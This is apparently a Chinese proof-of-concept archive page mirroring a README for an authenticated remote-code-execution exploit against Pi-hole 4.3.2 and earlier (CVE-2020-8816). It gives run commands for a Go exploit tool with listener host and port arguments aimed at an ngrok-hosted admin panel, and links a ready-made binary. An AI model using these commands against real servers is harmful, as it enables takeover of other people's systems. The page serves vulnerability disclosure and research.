关联漏洞
Description
Pi-hole ( <= 4.3.2) authenticated remote code execution.
介绍
## CVE 2020-8816 :
[Pi-hole](https://fr.wikipedia.org/wiki/Pi-hole) (versions <= 4.3.2 ) is affected by a Remote Code Execution vulnerability. An authenticated user of the Web portal can execute arbitrary command with the underlying server with the privileges of the local user executing the service.
## EXAMPLE :
` go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/ `
or download the binary [CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816/releases/tag/0.0.1) :
` ./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/ `
<img src="src/1.png" alt="page" style="zoom:25%;" />
<img src="src/2.png" alt="page" style="zoom:25%;" />
<img src="src/3.png" alt="page" style="zoom:25%;" />
## References :
- https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/
文件快照
[4.0K] /data/pocs/ccda3db15bf87da9aa8ea94485224fbc778379c3
├── [2.9K] CVE-2020-8816.go
├── [ 902] README.md
└── [4.0K] src
├── [ 26K] 1.png
├── [ 27K] 2.png
└── [ 30K] 3.png
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →